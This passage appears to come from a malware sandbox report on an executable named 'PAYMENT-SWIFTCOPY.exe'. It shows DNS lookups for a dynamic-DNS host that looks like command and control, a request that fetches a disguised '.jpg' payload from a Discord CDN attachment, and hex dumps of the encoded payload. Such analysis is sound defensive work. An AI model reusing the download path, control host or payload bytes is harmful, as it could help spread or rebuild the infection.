                                                                                                Oct 26, 2021 17:34:18.384594917 CEST8.8.8.8192.168.2.50x1f56No error (0)cdn.discordapp.com162.159.130.233A (IP address)IN (0x0001)
                                                                                                Oct 26, 2021 17:34:18.384594917 CEST8.8.8.8192.168.2.50x1f56No error (0)cdn.discordapp.com162.159.133.233A (IP address)IN (0x0001)
                                                                                                Oct 26, 2021 17:34:18.384594917 CEST8.8.8.8192.168.2.50x1f56No error (0)cdn.discordapp.com162.159.135.233A (IP address)IN (0x0001)
                                                                                                Oct 26, 2021 17:34:18.384594917 CEST8.8.8.8192.168.2.50x1f56No error (0)cdn.discordapp.com162.159.134.233A (IP address)IN (0x0001)
                                                                                                Oct 26, 2021 17:34:18.384594917 CEST8.8.8.8192.168.2.50x1f56No error (0)cdn.discordapp.com162.159.129.233A (IP address)IN (0x0001)
                                                                                                Oct 26, 2021 17:35:09.639238119 CEST8.8.8.8192.168.2.50x3f5dNo error (0)cdn.discordapp.com162.159.130.233A (IP address)IN (0x0001)
                                                                                                Oct 26, 2021 17:35:09.639238119 CEST8.8.8.8192.168.2.50x3f5dNo error (0)cdn.discordapp.com162.159.135.233A (IP address)IN (0x0001)
                                                                                                Oct 26, 2021 17:35:09.639238119 CEST8.8.8.8192.168.2.50x3f5dNo error (0)cdn.discordapp.com162.159.129.233A (IP address)IN (0x0001)
                                                                                                Oct 26, 2021 17:35:09.639238119 CEST8.8.8.8192.168.2.50x3f5dNo error (0)cdn.discordapp.com162.159.134.233A (IP address)IN (0x0001)
                                                                                                Oct 26, 2021 17:35:09.639238119 CEST8.8.8.8192.168.2.50x3f5dNo error (0)cdn.discordapp.com162.159.133.233A (IP address)IN (0x0001)
                                                                                                Oct 26, 2021 17:35:10.415817022 CEST8.8.8.8192.168.2.50x254No error (0)cdn.discordapp.com162.159.135.233A (IP address)IN (0x0001)
                                                                                                Oct 26, 2021 17:35:10.415817022 CEST8.8.8.8192.168.2.50x254No error (0)cdn.discordapp.com162.159.133.233A (IP address)IN (0x0001)
                                                                                                Oct 26, 2021 17:35:10.415817022 CEST8.8.8.8192.168.2.50x254No error (0)cdn.discordapp.com162.159.134.233A (IP address)IN (0x0001)
                                                                                                Oct 26, 2021 17:35:10.415817022 CEST8.8.8.8192.168.2.50x254No error (0)cdn.discordapp.com162.159.129.233A (IP address)IN (0x0001)
                                                                                                Oct 26, 2021 17:35:10.415817022 CEST8.8.8.8192.168.2.50x254No error (0)cdn.discordapp.com162.159.130.233A (IP address)IN (0x0001)
                                                                                                Oct 26, 2021 17:35:12.834665060 CEST8.8.8.8192.168.2.50xbb15No error (0)cdn.discordapp.com162.159.130.233A (IP address)IN (0x0001)
                                                                                                Oct 26, 2021 17:35:12.834665060 CEST8.8.8.8192.168.2.50xbb15No error (0)cdn.discordapp.com162.159.133.233A (IP address)IN (0x0001)
                                                                                                Oct 26, 2021 17:35:12.834665060 CEST8.8.8.8192.168.2.50xbb15No error (0)cdn.discordapp.com162.159.135.233A (IP address)IN (0x0001)
                                                                                                Oct 26, 2021 17:35:12.834665060 CEST8.8.8.8192.168.2.50xbb15No error (0)cdn.discordapp.com162.159.134.233A (IP address)IN (0x0001)
                                                                                                Oct 26, 2021 17:35:12.834665060 CEST8.8.8.8192.168.2.50xbb15No error (0)cdn.discordapp.com162.159.129.233A (IP address)IN (0x0001)
                                                                                                Oct 26, 2021 17:35:15.890234947 CEST8.8.8.8192.168.2.50xcb80No error (0)cdn.discordapp.com162.159.129.233A (IP address)IN (0x0001)
                                                                                                Oct 26, 2021 17:35:15.890234947 CEST8.8.8.8192.168.2.50xcb80No error (0)cdn.discordapp.com162.159.134.233A (IP address)IN (0x0001)
                                                                                                Oct 26, 2021 17:35:15.890234947 CEST8.8.8.8192.168.2.50xcb80No error (0)cdn.discordapp.com162.159.130.233A (IP address)IN (0x0001)
                                                                                                Oct 26, 2021 17:35:15.890234947 CEST8.8.8.8192.168.2.50xcb80No error (0)cdn.discordapp.com162.159.133.233A (IP address)IN (0x0001)
                                                                                                Oct 26, 2021 17:35:15.890234947 CEST8.8.8.8192.168.2.50xcb80No error (0)cdn.discordapp.com162.159.135.233A (IP address)IN (0x0001)
                                                                                                Oct 26, 2021 17:35:17.583018064 CEST8.8.8.8192.168.2.50x6c22No error (0)doc-file.ddns.net194.5.98.32A (IP address)IN (0x0001)
                                                                                                Oct 26, 2021 17:35:27.487956047 CEST8.8.8.8192.168.2.50x883bNo error (0)doc-file.ddns.net194.5.98.32A (IP address)IN (0x0001)
                                                                                                Oct 26, 2021 17:35:35.505229950 CEST8.8.8.8192.168.2.50xb161No error (0)doc-file.ddns.net194.5.98.32A (IP address)IN (0x0001)
                                                                                                Oct 26, 2021 17:35:44.650439978 CEST8.8.8.8192.168.2.50xd986No error (0)doc-file.ddns.net194.5.98.32A (IP address)IN (0x0001)
                                                                                                Oct 26, 2021 17:35:53.627926111 CEST8.8.8.8192.168.2.50x59c7No error (0)doc-file.ddns.net194.5.98.32A (IP address)IN (0x0001)
                                                                                                Oct 26, 2021 17:36:00.858899117 CEST8.8.8.8192.168.2.50x20aeNo error (0)doc-file.ddns.net194.5.98.32A (IP address)IN (0x0001)
                                                                                                Oct 26, 2021 17:36:18.125802994 CEST8.8.8.8192.168.2.50x522No error (0)doc-file.ddns.net194.5.98.32A (IP address)IN (0x0001)
                                                                                                Oct 26, 2021 17:36:53.840279102 CEST8.8.8.8192.168.2.50x1208No error (0)doc-file.ddns.net194.5.98.32A (IP address)IN (0x0001)

                                                                                                HTTP Request Dependency Graph

                                                                                                • cdn.discordapp.com

                                                                                                HTTPS Proxied Packets

                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                0192.168.2.549745162.159.130.233443C:\Users\user\Desktop\PAYMENT-SWIFTCOPY.exe
                                                                                                TimestampkBytes transferredDirectionData
                                                                                                2021-10-26 15:34:19 UTC0OUTGET /attachments/893177342426509335/902539094427578399/0CFA97D5.jpg HTTP/1.1
                                                                                                Host: cdn.discordapp.com
                                                                                                Connection: Keep-Alive
                                                                                                2021-10-26 15:34:19 UTC0INHTTP/1.1 200 OK
                                                                                                Date: Tue, 26 Oct 2021 15:34:19 GMT
                                                                                                Content-Type: image/jpeg
                                                                                                Content-Length: 1023400
                                                                                                Connection: close
                                                                                                CF-Ray: 6a44bf81e98c536a-FRA
                                                                                                Accept-Ranges: bytes
                                                                                                Age: 2070
                                                                                                Cache-Control: public, max-age=31536000
                                                                                                ETag: "d3cdbf4cf600f86ad718adfd07a223c2"
                                                                                                Expires: Wed, 26 Oct 2022 15:34:19 GMT
                                                                                                Last-Modified: Tue, 26 Oct 2021 12:48:08 GMT
                                                                                                Vary: Accept-Encoding
                                                                                                CF-Cache-Status: HIT
                                                                                                Alt-Svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                                                                                                Cf-Bgj: h2pri
                                                                                                Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                                                                x-goog-generation: 1635252488534942
                                                                                                x-goog-hash: crc32c=wjkzZg==
                                                                                                x-goog-hash: md5=082/TPYA+GrXGK39B6Ijwg==
                                                                                                x-goog-metageneration: 1
                                                                                                x-goog-storage-class: STANDARD
                                                                                                x-goog-stored-content-encoding: identity
                                                                                                x-goog-stored-content-length: 1023400
                                                                                                X-GUploader-UploadID: ADPycdt5fSirEYMb_NkxzZKC7t6tFfhYM04DPAmKMeDPJgfPgiJTBhU38u8ZzkjplNBvCv9YQAkb-5YryF3oMIp-UKg
                                                                                                X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=qh8IOCMHioeFA6M%2B%2BwSCb8mi6K%2FmaktKpS2ire8CT4NYDv%2FfLbyEEfetsokNQQ37B3vfXfBySxKAxneET9ipGPtRqMi2GPeHlXXS%2BuLH8RE%2FlfCwlcddYHJuVPIQTzKHCMzmdQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                2021-10-26 15:34:19 UTC1INData Raw: 4e 45 4c 3a 20 7b 22 73 75 63 63 65 73 73 5f 66 72 61 63 74 69 6f 6e 22 3a 30 2c 22 72 65 70 6f 72 74 5f 74 6f 22 3a 22 63 66 2d 6e 65 6c 22 2c 22 6d 61 78 5f 61 67 65 22 3a 36 30 34 38 30 30 7d 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 0d 0a
                                                                                                Data Ascii: NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflare
                                                                                                2021-10-26 15:34:19 UTC1INData Raw: 53 54 4d 67 69 50 70 6e 55 4f 2d 6e 6e 20 4f 53 20 54 69 69 20 53 20 67 20 53 20 53 20 53 20 69 20 53 20 53 20 53 20 4d 50 50 20 4d 50 50 20 53 20 53 20 54 55 69 20 53 20 53 20 53 20 53 20 53 20 53 20 53 20 70 69 20 53 20 53 20 53 20 53 20 53 20 53 20 53 20 53 20 53 20 53 20 53 20 53 20 53 20 53 20 53 20 53 20 53 20 53 20 53 20 53 20 53 20 53 20 53 20 53 20 53 20 53 20 53 20 53 20 53 20 53 20 53 20 53 20 53 20 53 20 53 20 54 4d 55 20 53 20 53 20 53 20 54 69 20 67 54 20 54 55 70 20 54 69 20 53 20 54 55 53 20 4f 20 4d 53 50 20 67 67 20 54 55 69 20 54 20 6e 70 20 4d 53 50 20 67 67 20 55 69 20 54 53 69 20 54 53 50 20 54 54 50 20 67 4d 20 54 54 4d 20 54 54 69 20 54 54 54 20 54 53 67 20 54 54 69 20 4f 6e 20 54 53 4f 20 67 4d 20 4f 4f 20 4f 6e 20 54 54 53 20 54
                                                                                                Data Ascii: STMgiPpnUO-nn OS Tii S g S S S i S S S MPP MPP S S TUi S S S S S S S pi S S S S S S S S S S S S S S S S S S S S S S S S S S S S S S S S S S S TMU S S S Ti gT TUp Ti S TUS O MSP gg TUi T np MSP gg Ui TSi TSP TTP gM TTM TTi TTT TSg TTi On TSO gM OO On TTS T
                                                                                                2021-10-26 15:34:19 UTC2INData Raw: 53 20 53 20 53 20 53 20 53 20 53 20 53 20 53 20 53 20 53 20 53 20 53 20 53 20 53 20 53 20 53 20 53 20 53 20 53 20 53 20 53 20 53 20 53 20 53 20 53 20 53 20 53 20 53 20 53 20 53 20 53 20 53 20 53 20 53 20 53 20 53 20 4d 50 20 69 53 20 4d 4d 4f 20 54 53 4f 20 54 54 50 20 50 53 20 69 55 20 50 53 20 50 53 20 55 69 20 54 54 69 20 54 54 6e 20 54 69 70 20 54 69 67 20 50 53 20 69 55 20 54 67 55 20 50 69 20 55 69 20 54 54 69 20 54 54 6e 20 54 53 4f 20 54 54 4d 20 50 53 20 54 54 4d 20 50 53 20 50 69 20 55 69 20 54 54 69 20 54 54 6e 20 54 53 4f 20 54 54 4d 20 50 53 20 69 55 20 50 53 20 50 69 20 55 69 20 54 54 69 20 54 54 6e 20 54 53 4f 20 54 54 4d 20 50 53 20 69 55 20 50 53 20 50 69 20 55 69 20 54 54 69 20 54 54 6e 20 54 53 4f 20 54 54 4d 20 50 53 20 69 55 20 50 53
                                                                                                Data Ascii: S S S S S S S S S S S S S S S S S S S S S S S S S S S S S S S S S S S S MP iS MMO TSO TTP PS iU PS PS Ui TTi TTn Tip Tig PS iU TgU Pi Ui TTi TTn TSO TTM PS TTM PS Pi Ui TTi TTn TSO TTM PS iU PS Pi Ui TTi TTn TSO TTM PS iU PS Pi Ui TTi TTn TSO TTM PS iU PS
                                                                                                2021-10-26 15:34:19 UTC4INData Raw: 20 54 70 55 20 4d 69 50 20 50 50 20 55 69 20 54 54 69 20 55 50 20 54 53 4f 20 54 54 4d 20 50 53 20 4d 69 55 20 50 54 20 50 69 20 55 69 20 54 54 4d 20 54 54 6e 20 54 53 4f 20 54 54 4d 20 50 53 20 69 55 20 50 53 20 50 69 20 55 69 20 54 54 69 20 54 54 6e 20 54 53 4f 20 54 54 4d 20 50 53 20 69 55 20 54 55 20 50 69 20 55 69 20 54 55 20 4f 54 20 67 54 20 4d 54 20 4f 69 20 4f 50 20 55 54 20 50 69 20 55 69 20 54 4d 70 20 54 54 6e 20 54 53 4f 20 54 54 4d 20 50 53 20 69 55 20 69 55 20 50 69 20 55 69 20 54 54 4d 20 54 54 6e 20 54 53 4f 20 54 54 4d 20 4d 69 55 20 69 4f 20 50 53 20 50 69 20 55 69 20 54 54 69 20 54 54 6e 20 54 53 4f 20 54 54 4d 20 50 53 20 69 55 20 50 53 20 50 69 20 55 69 20 54 54 69 20 50 67 20 54 53 4f 20 54 54 4d 20 54 54 4d 20 67 53 20 70 69 20 70
                                                                                                Data Ascii: TpU MiP PP Ui TTi UP TSO TTM PS MiU PT Pi Ui TTM TTn TSO TTM PS iU PS Pi Ui TTi TTn TSO TTM PS iU TU Pi Ui TU OT gT MT Oi OP UT Pi Ui TMp TTn TSO TTM PS iU iU Pi Ui TTM TTn TSO TTM MiU iO PS Pi Ui TTi TTn TSO TTM PS iU PS Pi Ui TTi Pg TSO TTM TTM gS pi p
                                                                                                2021-10-26 15:34:19 UTC5INData Raw: 70 4f 20 54 4d 20 54 54 70 20 54 53 4f 20 54 54 4d 20 50 69 20 4f 50 20 54 69 20 50 69 20 55 69 20 54 4d 53 20 4f 50 20 54 53 4f 20 4f 4f 20 4d 20 69 4f 20 50 53 20 70 54 20 55 69 20 54 54 69 20 54 54 6e 20 54 54 53 20 54 54 4d 20 50 53 20 67 67 20 6e 70 20 50 4d 20 55 69 20 54 54 69 20 54 54 67 20 4d 20 6e 6e 20 50 53 20 69 55 20 50 70 20 4d 55 20 55 69 20 4f 6e 20 70 4f 20 54 53 55 20 54 54 4d 20 50 6e 20 69 55 20 50 53 20 50 69 20 55 53 20 54 54 69 20 54 54 6e 20 54 4d 69 20 54 69 20 69 4f 20 69 55 20 50 53 20 50 53 20 50 4f 20 6e 70 20 54 54 6e 20 54 53 4f 20 54 4d 4d 20 4d 69 20 69 55 20 67 67 20 70 20 55 50 20 54 54 69 20 54 4d 70 20 54 53 4f 20 54 54 4d 20 50 53 20 50 67 20 50 53 20 50 69 20 70 4f 20 54 4d 20 54 54 67 20 54 53 4f 20 54 54 4d 20 50
                                                                                                Data Ascii: pO TM TTp TSO TTM Pi OP Ti Pi Ui TMS OP TSO OO M iO PS pT Ui TTi TTn TTS TTM PS gg np PM Ui TTi TTg M nn PS iU Pp MU Ui On pO TSU TTM Pn iU PS Pi US TTi TTn TMi Ti iO iU PS PS PO np TTn TSO TMM Mi iU gg p UP TTi TMp TSO TTM PS Pg PS Pi pO TM TTg TSO TTM P
                                                                                                2021-10-26 15:34:19 UTC6INData Raw: 4d 4d 69 20 69 69 20 67 53 20 54 6e 54 20 54 54 69 20 54 54 6e 20 54 53 6e 20 54 53 4d 20 54 4f 54 20 54 50 50 20 50 53 20 50 69 20 55 50 20 4f 53 20 70 54 20 54 53 4f 20 54 54 4d 20 50 70 20 70 6e 20 54 4d 67 20 50 69 20 55 69 20 54 4d 53 20 54 50 20 67 53 20 50 55 20 50 53 20 69 55 20 50 70 20 67 50 20 54 4d 54 20 54 54 67 20 55 67 20 6e 53 20 54 54 4f 20 54 6e 55 20 50 70 20 50 53 20 50 69 20 55 53 20 55 4f 20 54 54 6e 20 54 4f 20 54 4d 53 20 50 53 20 69 55 20 50 69 20 4d 67 53 20 4f 4d 20 54 54 69 20 54 54 6e 20 54 54 55 20 55 55 20 54 54 70 20 69 55 20 50 53 20 70 53 20 70 69 20 4d 4f 20 70 4d 20 54 53 4f 20 54 54 4d 20 50 70 20 4d 69 20 50 69 20 50 69 20 55 69 20 55 4f 20 54 54 53 20 70 69 20 54 54 55 20 4d 53 20 4d 67 6e 20 6e 55 20 50 69 20 55 69
                                                                                                Data Ascii: MMi ii gS TnT TTi TTn TSn TSM TOT TPP PS Pi UP OS pT TSO TTM Pp pn TMg Pi Ui TMS TP gS PU PS iU Pp gP TMT TTg Ug nS TTO TnU Pp PS Pi US UO TTn TO TMS PS iU Pi MgS OM TTi TTn TTU UU TTp iU PS pS pi MO pM TSO TTM Pp Mi Pi Pi Ui UO TTS pi TTU MS Mgn nU Pi Ui
                                                                                                2021-10-26 15:34:19 UTC8INData Raw: 20 4f 50 20 54 54 69 20 6e 50 20 55 55 20 54 53 67 20 69 55 20 50 53 20 70 53 20 54 4d 70 20 55 69 20 4f 69 20 54 50 69 20 54 54 4d 20 69 4f 20 53 20 50 70 20 50 69 20 4f 54 20 54 54 69 20 54 54 6e 20 54 53 4f 20 54 54 4d 20 50 53 20 69 55 20 50 53 20 50 4d 20 6e 55 20 54 53 54 20 55 55 20 54 53 70 20 55 70 20 4d 70 20 54 54 67 20 50 53 20 50 69 20 4f 69 20 55 55 20 55 67 20 6e 53 20 54 67 50 20 50 53 20 67 50 20 4d 20 50 53 20 55 69 20 54 54 54 20 54 54 6e 20 54 53 4f 20 54 54 4d 20 50 6e 20 69 55 20 50 53 20 67 4f 20 55 70 20 54 53 67 20 4f 55 20 70 69 20 4f 55 20 4d 53 20 50 54 20 67 4f 20 69 67 20 54 4d 54 20 54 4d 50 20 55 67 20 70 4f 20 67 69 20 50 53 20 69 55 20 50 70 20 67 53 20 6e 20 54 54 69 20 54 54 6e 20 54 53 67 20 4f 53 20 4d 53 20 4d 6e 20
                                                                                                Data Ascii: OP TTi nP UU TSg iU PS pS TMp Ui Oi TPi TTM iO S Pp Pi OT TTi TTn TSO TTM PS iU PS PM nU TST UU TSp Up Mp TTg PS Pi Oi UU Ug nS TgP PS gP M PS Ui TTT TTn TSO TTM Pn iU PS gO Up TSg OU pi OU MS PT gO ig TMT TMP Ug pO gi PS iU Pp gS n TTi TTn TSg OS MS Mn
                                                                                                2021-10-26 15:34:19 UTC9INData Raw: 50 53 20 50 53 20 50 4f 20 67 6e 20 54 54 6e 20 54 53 4f 20 54 4d 4d 20 4d 70 20 67 6e 20 50 54 20 50 69 20 55 4d 20 54 54 4d 20 4f 4f 20 4d 69 6e 20 69 20 50 70 20 69 55 20 50 53 20 69 50 20 6e 69 20 4f 50 20 54 4d 6e 20 6e 50 20 54 69 20 50 20 69 55 20 50 53 20 50 53 20 54 4d 53 20 4f 70 20 4f 69 20 54 54 53 20 54 4d 4d 20 4d 50 20 54 4f 70 20 6e 70 20 53 20 55 69 20 54 54 69 20 54 54 67 20 54 53 6e 20 55 55 20 54 53 69 20 69 4f 20 50 53 20 69 55 20 54 4d 54 20 54 54 55 20 4f 55 20 54 53 4d 20 4f 54 20 69 55 20 67 55 20 50 6e 20 69 4f 20 54 4d 69 20 54 53 4f 20 54 54 6e 20 54 53 4f 20 54 54 55 20 4d 69 20 67 50 20 4d 20 50 67 20 55 69 20 70 54 20 54 54 6e 20 54 53 4f 20 54 54 4d 20 67 69 20 69 55 20 50 53 20 67 4f 20 55 70 20 54 53 53 20 4d 67 4f 20 4d
                                                                                                Data Ascii: PS PS PO gn TTn TSO TMM Mp gn PT Pi UM TTM OO Min i Pp iU PS iP ni OP TMn nP Ti P iU PS PS TMS Op Oi TTS TMM MP TOp np S Ui TTi TTg TSn UU TSi iO PS iU TMT TTU OU TSM OT iU gU Pn iO TMi TSO TTn TSO TTU Mi gP M Pg Ui pT TTn TSO TTM gi iU PS gO Up TSS MgO M
                                                                                                2021-10-26 15:34:19 UTC10INData Raw: 4f 20 54 54 55 20 6e 70 20 54 53 20 50 53 20 50 69 20 55 53 20 4d 4f 20 69 67 20 54 53 4f 20 54 54 4d 20 50 70 20 67 50 20 50 6e 20 54 69 20 54 4f 55 20 54 54 69 20 54 54 6e 20 54 53 4f 20 4f 55 20 50 6e 20 4d 69 20 54 53 4f 20 50 69 20 55 69 20 54 4d 53 20 54 53 4d 20 54 53 70 20 54 54 55 20 67 50 20 50 50 20 6e 67 20 67 4f 20 55 69 20 54 54 69 20 54 54 67 20 4d 20 54 70 20 50 53 20 69 55 20 50 70 20 4d 70 20 55 54 20 6e 69 20 53 20 54 53 4f 20 54 54 4d 20 50 53 20 67 4f 20 54 6e 55 20 70 67 20 55 69 20 54 54 69 20 54 54 67 20 6e 6e 20 4d 53 55 20 4d 50 20 4d 4d 69 20 69 69 20 67 53 20 54 6e 54 20 54 54 69 20 54 54 6e 20 54 53 6e 20 4f 6e 20 50 67 20 6e 50 20 67 50 20 50 69 20 55 69 20 54 54 55 20 4d 69 4f 20 67 6e 20 54 54 4d 20 50 53 20 69 4f 20 4d 70
                                                                                                Data Ascii: O TTU np TS PS Pi US MO ig TSO TTM Pp gP Pn Ti TOU TTi TTn TSO OU Pn Mi TSO Pi Ui TMS TSM TSp TTU gP PP ng gO Ui TTi TTg M Tp PS iU Pp Mp UT ni S TSO TTM PS gO TnU pg Ui TTi TTg nn MSU MP MMi ii gS TnT TTi TTn TSn On Pg nP gP Pi Ui TTU MiO gn TTM PS iO Mp
                                                                                                2021-10-26 15:34:19 UTC12INData Raw: 6e 53 20 54 4d 55 20 50 6e 20 4d 6e 20 54 4f 50 20 70 4f 20 54 4d 53 20 54 54 69 20 54 54 6e 20 54 53 6e 20 54 4d 69 20 50 55 20 50 53 20 50 67 20 54 6e 4d 20 69 50 20 50 55 20 54 54 6e 20 54 53 4f 20 54 54 67 20 70 6e 20 54 4d 53 20 50 53 20 50 69 20 55 50 20 54 50 20 54 53 53 20 54 53 4f 20 54 54 4d 20 50 69 20 50 70 20 69 55 20 69 4f 20 70 6e 20 69 4d 20 4d 67 4f 20 4d 53 20 70 70 20 50 53 20 69 55 20 50 54 20 6e 54 20 54 53 4d 20 54 54 69 20 54 54 6e 20 54 53 55 20 54 67 20 70 54 20 69 55 20 50 53 20 50 53 20 4f 4d 20 54 54 4d 20 54 54 69 20 54 54 6e 20 69 53 20 54 70 55 20 70 55 20 54 50 67 20 50 69 20 55 69 20 54 54 50 20 55 20 54 4d 50 20 54 54 4d 20 50 53 20 50 4d 20 50 55 20 50 4d 20 55 67 20 54 53 6e 20 69 50 20 4d 69 6e 20 4f 20 54 55 20 69 55
                                                                                                Data Ascii: nS TMU Pn Mn TOP pO TMS TTi TTn TSn TMi PU PS Pg TnM iP PU TTn TSO TTg pn TMS PS Pi UP TP TSS TSO TTM Pi Pp iU iO pn iM MgO MS pp PS iU PT nT TSM TTi TTn TSU Tg pT iU PS PS OM TTM TTi TTn iS TpU pU TPg Pi Ui TTP U TMP TTM PS PM PU PM Ug TSn iP Min O TU iU
                                                                                                2021-10-26 15:34:19 UTC13INData Raw: 20 54 54 67 20 70 4f 20 54 53 53 20 54 54 4d 20 4d 50 20 69 55 20 50 53 20 50 69 20 55 69 20 54 54 69 20 54 54 6e 20 54 53 4f 20 54 54 69 20 69 4f 20 69 69 20 67 54 20 67 4f 20 54 54 69 20 55 69 20 54 54 4f 20 54 53 50 20 54 53 67 20 67 54 20 67 67 20 4d 53 20 54 70 20 55 70 20 54 54 4f 20 4f 55 20 70 69 20 4f 6e 20 4d 53 20 4d 4d 20 4d 69 20 6e 50 20 4f 50 20 54 54 69 20 54 54 6e 20 54 53 50 20 4f 54 20 4d 54 70 20 6e 6e 20 70 4d 20 50 69 20 55 69 20 54 54 55 20 4f 69 20 54 67 50 20 54 67 20 70 67 20 69 55 20 50 53 20 50 53 20 54 4d 6e 20 54 50 4d 20 54 54 6e 20 54 4d 70 20 70 69 20 50 4d 20 69 55 20 54 55 54 20 50 69 20 55 69 20 54 54 69 20 4f 6e 20 54 53 4f 20 54 54 4d 20 67 50 20 50 53 20 67 6e 20 54 70 6e 20 70 70 20 4f 69 20 4f 69 20 6e 50 20 54 54
                                                                                                Data Ascii: TTg pO TSS TTM MP iU PS Pi Ui TTi TTn TSO TTi iO ii gT gO TTi Ui TTO TSP TSg gT gg MS Tp Up TTO OU pi On MS MM Mi nP OP TTi TTn TSP OT MTp nn pM Pi Ui TTU Oi TgP Tg pg iU PS PS TMn TPM TTn TMp pi PM iU TUT Pi Ui TTi On TSO TTM gP PS gn Tpn pp Oi Oi nP TT
                                                                                                2021-10-26 15:34:19 UTC14INData Raw: 20 54 54 54 20 54 53 4d 20 67 4f 20 4d 4f 20 67 4d 20 54 70 20 69 6e 20 54 53 70 20 54 54 6e 20 54 53 4f 20 54 54 70 20 69 4f 20 69 50 20 67 70 20 4d 70 20 4f 69 20 55 69 20 4d 70 20 50 20 54 54 4d 20 50 53 20 50 55 20 4d 69 20 54 70 20 54 4d 6e 20 54 50 55 20 55 67 20 6e 53 20 54 67 4d 20 69 4f 20 53 20 50 70 20 50 69 20 54 53 53 20 54 54 69 20 54 54 6e 20 54 53 4f 20 54 54 4d 20 50 53 20 69 55 20 50 53 20 50 4d 20 6e 70 20 54 53 69 20 55 55 20 54 53 67 20 55 70 20 6e 67 20 69 53 20 50 53 20 50 69 20 55 53 20 4f 50 20 54 54 50 20 6e 53 20 54 54 50 20 4d 53 20 4d 6e 20 54 4f 55 20 4d 55 20 55 70 20 54 54 54 20 54 53 50 20 70 69 20 4f 55 20 4d 53 20 6e 50 20 69 4d 20 50 69 20 55 69 20 54 54 55 20 54 54 55 20 54 4d 53 20 54 53 70 20 67 54 20 50 55 20 4d 53
                                                                                                Data Ascii: TTT TSM gO MO gM Tp in TSp TTn TSO TTp iO iP gp Mp Oi Ui Mp P TTM PS PU Mi Tp TMn TPU Ug nS TgM iO S Pp Pi TSS TTi TTn TSO TTM PS iU PS PM np TSi UU TSg Up ng iS PS Pi US OP TTP nS TTP MS Mn TOU MU Up TTT TSP pi OU MS nP iM Pi Ui TTU TTU TMS TSp gT PU MS
                                                                                                2021-10-26 15:34:19 UTC16INData Raw: 55 69 20 4f 69 20 54 50 67 20 4f 53 20 69 55 20 69 4d 20 67 6e 20 4d 6e 20 6e 54 20 55 69 20 54 69 20 54 54 70 20 54 54 4d 20 50 53 20 50 4d 20 69 4f 20 69 53 20 6e 6e 20 4f 50 20 54 4d 70 20 6e 50 20 54 54 70 20 4f 67 20 4f 50 20 50 53 20 50 69 20 4f 69 20 55 55 20 55 67 20 6e 53 20 54 50 50 20 4d 53 20 4d 6e 20 54 4f 67 20 50 69 20 55 69 20 54 54 69 20 54 54 55 20 4f 67 20 54 4d 4d 20 50 53 20 4d 67 20 50 53 20 50 69 20 55 69 20 54 54 69 20 54 54 6e 20 54 53 4f 20 54 54 4d 20 69 55
                                                                                                Data Ascii: Ui Oi TPg OS iU iM gn Mn nT Ui Ti TTp TTM PS PM iO iS nn OP TMp nP TTp Og OP PS Pi Oi UU Ug nS TPP MS Mn TOg Pi Ui TTi TTU Og TMM PS Mg PS Pi Ui TTi TTn TSO TTM iU
                                                                                                2021-10-26 15:34:19 UTC16INData Raw: 20 69 67 20 69 67 20 4d 6e 20 4f 69 20 55 69 20 54 69 20 54 54 4f 20 54 54 4d 20 50 53 20 50 4d 20 67 54 20 69 55 20 54 4d 6e 20 54 54 67 20 55 67 20 6e 53 20 54 67 4d 20 4d 69 20 50 53 20 69 4d 20 69 4d 20 54 4d 54 20 54 4d 70 20 55 67 20 4d 4d 20 54 53 70 20 50 53 20 69 55 20 50 69 20 55 4f 20 67 70 20 54 54 69 20 54 54 6e 20 54 53 67 20 4f 53 20 4d 53 20 4d 6e 20 54 4f 4d 20 50 69 20 55 6e 20 70 70 20 54 4d 6e 20 54 53 4f 20 55 6e 20 50 53 20 69 55 20 50 53 20 50 69 20 55 69 20 54 54 69 20 54 54 6e 20 54 54 54 20 54 53 67 20 69 53 20 4d 4f 20 50 70 20 54 70 20 69 6e 20 54 53 69 20 54 54 6e 20 54 53 4f 20 54 54 70 20 67 54 20 50 69 20 4d 50 20 50 67 20 54 54 69 20 55 4f 20 54 4d 4f 20 6e 54 20 54 54 69 20 69 53 20 69 69 20 67 54 20 50 55 20 54 54 69 20
                                                                                                Data Ascii: ig ig Mn Oi Ui Ti TTO TTM PS PM gT iU TMn TTg Ug nS TgM Mi PS iM iM TMT TMp Ug MM TSp PS iU Pi UO gp TTi TTn TSg OS MS Mn TOM Pi Un pp TMn TSO Un PS iU PS Pi Ui TTi TTn TTT TSg iS MO Pp Tp in TSi TTn TSO TTp gT Pi MP Pg TTi UO TMO nT TTi iS ii gT PU TTi
                                                                                                2021-10-26 15:34:19 UTC17INData Raw: 20 54 54 4d 20 50 4d 20 4d 70 20 4d 53 20 4d 4f 20 54 70 67 20 54 54 69 20 54 54 54 20 70 4f 20 4d 67 6e 20 50 53 20 69 55 20 50 4d 20 4d 55 20 55 69 20 4f 6e 20 70 4f 20 54 53 50 20 54 54 4d 20 54 70 4f 20 69 55 20 50 53 20 50 69 20 6e 70 20 54 54 69 20 54 54 6e 20 54 4d 69 20 54 53 50 20 54 4f 54 20 54 67 4f 20 50 53 20 50 69 20 55 50 20 54 53 55 20 6e 4f 20 54 55 20 54 54 4d 20 50 53 20 69 55 20 4d 53 20 69 55 20 70 70 20 54 70 4d 20 54 53 53 20 54 53 4f 20 54 54 4d 20 50 54 20 4d 69 20 54 54 70 20 50 69 20 55 69 20 54 4d 53 20 4d 54 50 20 54 53 6e 20 54 53 67 20 4d 4d 70 20 67 4d 20 50 53 20 50 69 20 55 50 20 4f 53 20 50 54 20 54 53 4f 20 54 54 4d 20 50 70 20 54 69 70 20 50 4d 20 69 70 20 54 67 4d 20 54 4d 50 20 54 54 6e 20 54 53 4f 20 54 54 67 20 4d
